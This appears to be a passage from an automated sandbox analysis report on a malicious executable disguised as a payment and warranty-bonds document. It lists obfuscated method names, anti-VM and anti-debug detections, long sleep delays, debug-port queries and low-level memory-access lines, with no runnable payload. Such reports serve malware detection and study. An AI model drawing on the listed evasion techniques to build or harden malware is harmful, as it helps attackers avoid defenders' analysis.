                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, ABxuR4jclTb0QJbmgq0.csHigh entropy of concatenated method names: 'CAgYi4V1y5', 'I6wYaY9hQI', 'se5YHdoFsn', 'hVRYDFlshx', 'jQjYTPCAPw', 'bZKYuQBh01', 'LV8YjC82j3', 'prVYWDGqoP', 'n9AY2ogqLB', 'EoCYc32oYc'
                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, NrmpeS2PNSGs7X0CKD.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'MML3UFDoQs', 'oUg3BDrqxO', 'YdD3z8O835', 'UOhyNCpGOT', 'UbxyItfSQD', 'Qwly3XhCgV', 'a18yyLCnyV', 'h6uNpK9RXoM5RfXeO5A'
                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, lEe6OTuveACY3rt9Ok.csHigh entropy of concatenated method names: 'qrh8S7yRlu', 'AiJ8OqTS4D', 'lb08QL85Vx', 'pPa8nnEGVH', 'RDm8XRm892', 'fYM8kR20tL', 'Vdp8ma3QbK', 'AJ28E0hGrk', 'tAW8LXAjig', 'nuo8f4kWr1'
                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, RujqcAN6TG7qku38oo.csHigh entropy of concatenated method names: 'W6GXCbkhYm', 'kyEXiOkO2m', 's86XH1MPny', 'KbvXDVX5Iw', 'vBSXum4ZBf', 'jyBXjGiLIw', 'KATX2ma6f0', 'Px0Xcy6LcF', 'YRhTPekJlhCxTkSTO4t', 'vVwG1ekUNYHQOqdtFgh'
                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, Qcbo1atUNRX5uYhT4D.csHigh entropy of concatenated method names: 'ToString', 'rDRFM5qZ6M', 'oVQFxe49US', 'bqnFendFYA', 'OFZFoXUlaY', 'G35F08iHIv', 'tt2FdDluNJ', 'OrDFJtX3HI', 'VPpF99gk7h', 'R55F7JOdl4'
                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, MnUca67wwyq9isAD8V.csHigh entropy of concatenated method names: 'dpLnTegVLt', 'IgJnj86fhB', 'hCGQeCaxKL', 'n7nQoj0QqV', 'qQdQ00scvT', 'x5QQdbU60m', 'qUlQJNVAcU', 'qhuQ9srbnR', 'gYLQ7ABKWg', 'wpbQsqU9Ne'
                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, JFv6NDqobKO3oP7PJ5.csHigh entropy of concatenated method names: 'j0aXb4KEqm', 'EgAXOSi0p1', 'yNPXnR8iXq', 'bWjXk6N8N8', 'qHGXm7WVf6', 'sqwnKmvrfr', 'Vg7nhGPqqA', 'PVDnql004i', 'aWSnRaDRZj', 'gk8nUGtmqr'
                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, uLGJVHvUgM9ulOmn62.csHigh entropy of concatenated method names: 'a0DHPDf5h', 'gqNDCpfPk', 'orvuvVjmp', 'hDajMGx7H', 'YOw2qXi4r', 'e68cmLJkm', 'BVy6WQO0K8o6lAXNBt', 'gIy4ZgNlOJdfCjPBbp', 'G5r8UUbm0', 'dufgrMc9q'
                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, uPpMvls1PHjFnvTcDG.csHigh entropy of concatenated method names: 'Tkr8v62gZO', 'KKy8xIbLh1', 'SoH8euyMJH', 'aDF8opnAL0', 'VTh8pc90ZI', 'K3M80JlFeE', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, pN57RL3xyXkW5ANnHQ.csHigh entropy of concatenated method names: 'U8AybimXgu', 'T18yS8nemQ', 'Q5YyOVMPp2', 'ndjyQ2tjAW', 'uLvyn3pmLf', 'vx8yXoZe2b', 'NiaykWcRm5', 'dw7ympHo41', 'APUyEmTssh', 'DPFyLNiOf0'
                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, hsiK9PiqZrfnl6rMvi.csHigh entropy of concatenated method names: 'qWHQDnd3hK', 'g8uQuCWTZq', 'Db4QWEv1S7', 'X0OQ2ux8Qb', 'd5eQr8udm2', 'VbMQFUvxGO', 'BAjQ5wOKcH', 'OaWQ8CKrIg', 'm4KQY95xUx', 'N6kQgsLifj'
                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, c3QNNUoubAttVxH9S2.csHigh entropy of concatenated method names: 'ygp5LXincf', 'arO5fUTQrR', 'ToString', 'xMI5SQtPiM', 'xkd5ODAQ8v', 'JNd5QFlM44', 'FXh5naDk8m', 'jUs5XeXvhw', 'sTt5k1sJtu', 'K6T5mcUE48'
                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, LjvKfjQI7ZTyW35Lpd.csHigh entropy of concatenated method names: 'gADAWbr7XE', 'fbeA2km7Vk', 'w3jAvKbNKf', 'cAlAxbdhLn', 'tIYAoYR5SG', 'x9PA0HRtXZ', 'iIXAJNClKR', 'kgYA9KUrf4', 'mioAs4iaWq', 'jTLAMX6d8V'
                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, CGdMn0bkxNbGSKYFA0.csHigh entropy of concatenated method names: 'Dispose', 'PsJIUKMDsf', 'uX53xjA5Ed', 'r0Uttl1o0A', 'UPYIBy8eCX', 'zQ6IzH00tk', 'ProcessDialogKey', 'UQT3NQvIxK', 'z4M3IFZNsI', 'H1O33hWBNe'
                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, ioi8Rkz6CpkkqYwguL.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uRVYApIJbY', 'NIyYrEHUlj', 'EHuYFuNKBF', 'GaYY56xelw', 'gsbY8dqZLb', 'X3xYY9XALK', 'qBXYgelKcZ'
                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, jfce7djWOMMimZwhZQb.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zvogpc13wh', 'SmhgGyeWRf', 'xQHgVpIj1H', 'Qucg17uLjn', 'o6vgKE1bns', 'N3RghoqBN7', 'LoigqfyjmO'
                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, cILh9bHvx4dPN3VnUI.csHigh entropy of concatenated method names: 'Nl3OpoF2TO', 't9dOGPKSpm', 'elcOVU9JsF', 'C4hO1kUwGo', 'knhOK1M0lx', 'c4kOhSyJfK', 'jrMOqZFNb6', 'NXjOR0XNbK', 'rM4OUrjy7y', 'tGSOBYrBio'
                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, qtiCGhV5g3bg8x5VxE.csHigh entropy of concatenated method names: 'f14Ik3ayGQ', 'lxAImDcpuG', 'lqRILNo2n3', 'zlOIfO9NSy', 'yW5Ir7XStc', 'DdwIFvY5AB', 'FMGRR7EYd0dL4b47ss', 'pABd7rLec7iDJoHWIv', 'p6TII6gSOZ', 'EoEIysVF79'
                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, HYqHWc4dupAKCWiUdf.csHigh entropy of concatenated method names: 'ihMYIPWspP', 'XdUYykfAWJ', 'elYYlxVOjF', 'mmUYS4MmeQ', 'QXSYOXVIOR', 'PWGYn6IIEv', 'J6xYXV4EiH', 'xIL8qaTmtN', 'KZm8Re7Mm6', 'K828UFM2CB'
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: Payment&WarantyBonds.exe PID: 6900, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\systeminfo.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\systeminfo.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\systeminfo.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\systeminfo.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\systeminfo.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\systeminfo.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\systeminfo.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\systeminfo.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeMemory allocated: 2800000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeMemory allocated: 29C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeMemory allocated: 49C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeMemory allocated: 88D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeMemory allocated: 98D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeMemory allocated: 9AD0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeMemory allocated: AAD0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeMemory allocated: B510000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeMemory allocated: C510000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeMemory allocated: D510000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0149D1C0 rdtsc 2_2_0149D1C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeWindow / User API: threadDelayed 2967Jump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeWindow / User API: threadDelayed 7006Jump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeAPI coverage: 0.8 %
                Source: C:\Windows\SysWOW64\systeminfo.exeAPI coverage: 2.7 %
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe TID: 1880Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exe TID: 4904Thread sleep count: 2967 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exe TID: 4904Thread sleep time: -5934000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exe TID: 4904Thread sleep count: 7006 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exe TID: 4904Thread sleep time: -14012000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe TID: 6592Thread sleep time: -70000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe TID: 6592Thread sleep count: 37 > 30Jump to behavior
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe TID: 6592Thread sleep time: -55500s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe TID: 6592Thread sleep count: 39 > 30Jump to behavior
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe TID: 6592Thread sleep time: -39000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\systeminfo.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0056C500 FindFirstFileW,FindNextFileW,FindClose,7_2_0056C500
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: oDnyHukDVUZk.exe, 00000008.00000002.4147684727.000000000065F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllY
                Source: systeminfo.exe, 00000007.00000002.4147496833.0000000000909000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: firefox.exe, 00000009.00000002.2367290792.0000016C5E48C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\\
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0149D1C0 rdtsc 2_2_0149D1C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_00417643 LdrLoadDll,2_2_00417643
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01419148 mov eax, dword ptr fs:[00000030h]2_2_01419148
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01419148 mov eax, dword ptr fs:[00000030h]2_2_01419148
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01419148 mov eax, dword ptr fs:[00000030h]2_2_01419148
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01419148 mov eax, dword ptr fs:[00000030h]2_2_01419148
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014B4144 mov eax, dword ptr fs:[00000030h]2_2_014B4144
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014B4144 mov eax, dword ptr fs:[00000030h]2_2_014B4144
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014B4144 mov ecx, dword ptr fs:[00000030h]2_2_014B4144
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014B4144 mov eax, dword ptr fs:[00000030h]2_2_014B4144
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014B4144 mov eax, dword ptr fs:[00000030h]2_2_014B4144
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01427152 mov eax, dword ptr fs:[00000030h]2_2_01427152
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014B8158 mov eax, dword ptr fs:[00000030h]2_2_014B8158
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01426154 mov eax, dword ptr fs:[00000030h]2_2_01426154
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01426154 mov eax, dword ptr fs:[00000030h]2_2_01426154
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141C156 mov eax, dword ptr fs:[00000030h]2_2_0141C156
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014F5152 mov eax, dword ptr fs:[00000030h]2_2_014F5152
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014B9179 mov eax, dword ptr fs:[00000030h]2_2_014B9179
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141F172 mov eax, dword ptr fs:[00000030h]2_2_0141F172
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141F172 mov eax, dword ptr fs:[00000030h]2_2_0141F172
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141F172 mov eax, dword ptr fs:[00000030h]2_2_0141F172
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141F172 mov eax, dword ptr fs:[00000030h]2_2_0141F172
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141F172 mov eax, dword ptr fs:[00000030h]2_2_0141F172
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141F172 mov eax, dword ptr fs:[00000030h]2_2_0141F172
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141F172 mov eax, dword ptr fs:[00000030h]2_2_0141F172
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141F172 mov eax, dword ptr fs:[00000030h]2_2_0141F172
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141F172 mov eax, dword ptr fs:[00000030h]2_2_0141F172
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141F172 mov eax, dword ptr fs:[00000030h]2_2_0141F172
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141F172 mov eax, dword ptr fs:[00000030h]2_2_0141F172
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141F172 mov eax, dword ptr fs:[00000030h]2_2_0141F172
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141F172 mov eax, dword ptr fs:[00000030h]2_2_0141F172
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141F172 mov eax, dword ptr fs:[00000030h]2_2_0141F172
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141F172 mov eax, dword ptr fs:[00000030h]2_2_0141F172
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141F172 mov eax, dword ptr fs:[00000030h]2_2_0141F172
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141F172 mov eax, dword ptr fs:[00000030h]2_2_0141F172
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141F172 mov eax, dword ptr fs:[00000030h]2_2_0141F172
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141F172 mov eax, dword ptr fs:[00000030h]2_2_0141F172
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141F172 mov eax, dword ptr fs:[00000030h]2_2_0141F172
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141F172 mov eax, dword ptr fs:[00000030h]2_2_0141F172
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014CA118 mov ecx, dword ptr fs:[00000030h]2_2_014CA118
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014CA118 mov eax, dword ptr fs:[00000030h]2_2_014CA118
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014CA118 mov eax, dword ptr fs:[00000030h]2_2_014CA118
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014CA118 mov eax, dword ptr fs:[00000030h]2_2_014CA118
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014E0115 mov eax, dword ptr fs:[00000030h]2_2_014E0115
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01450124 mov eax, dword ptr fs:[00000030h]2_2_01450124
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01421131 mov eax, dword ptr fs:[00000030h]2_2_01421131
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01421131 mov eax, dword ptr fs:[00000030h]2_2_01421131
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141B136 mov eax, dword ptr fs:[00000030h]2_2_0141B136
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141B136 mov eax, dword ptr fs:[00000030h]2_2_0141B136
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141B136 mov eax, dword ptr fs:[00000030h]2_2_0141B136
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141B136 mov eax, dword ptr fs:[00000030h]2_2_0141B136
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014F51CB mov eax, dword ptr fs:[00000030h]2_2_014F51CB
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014E61C3 mov eax, dword ptr fs:[00000030h]2_2_014E61C3
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014E61C3 mov eax, dword ptr fs:[00000030h]2_2_014E61C3
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0145D1D0 mov eax, dword ptr fs:[00000030h]2_2_0145D1D0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0145D1D0 mov ecx, dword ptr fs:[00000030h]2_2_0145D1D0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0149E1D0 mov eax, dword ptr fs:[00000030h]2_2_0149E1D0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0149E1D0 mov eax, dword ptr fs:[00000030h]2_2_0149E1D0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0149E1D0 mov ecx, dword ptr fs:[00000030h]2_2_0149E1D0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0149E1D0 mov eax, dword ptr fs:[00000030h]2_2_0149E1D0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0149E1D0 mov eax, dword ptr fs:[00000030h]2_2_0149E1D0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014F61E5 mov eax, dword ptr fs:[00000030h]2_2_014F61E5
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014451EF mov eax, dword ptr fs:[00000030h]2_2_014451EF
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014451EF mov eax, dword ptr fs:[00000030h]2_2_014451EF
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014451EF mov eax, dword ptr fs:[00000030h]2_2_014451EF
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014451EF mov eax, dword ptr fs:[00000030h]2_2_014451EF
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014451EF mov eax, dword ptr fs:[00000030h]2_2_014451EF
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014451EF mov eax, dword ptr fs:[00000030h]2_2_014451EF
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014451EF mov eax, dword ptr fs:[00000030h]2_2_014451EF
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014451EF mov eax, dword ptr fs:[00000030h]2_2_014451EF
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014451EF mov eax, dword ptr fs:[00000030h]2_2_014451EF
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014451EF mov eax, dword ptr fs:[00000030h]2_2_014451EF
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014451EF mov eax, dword ptr fs:[00000030h]2_2_014451EF
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014451EF mov eax, dword ptr fs:[00000030h]2_2_014451EF
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014451EF mov eax, dword ptr fs:[00000030h]2_2_014451EF
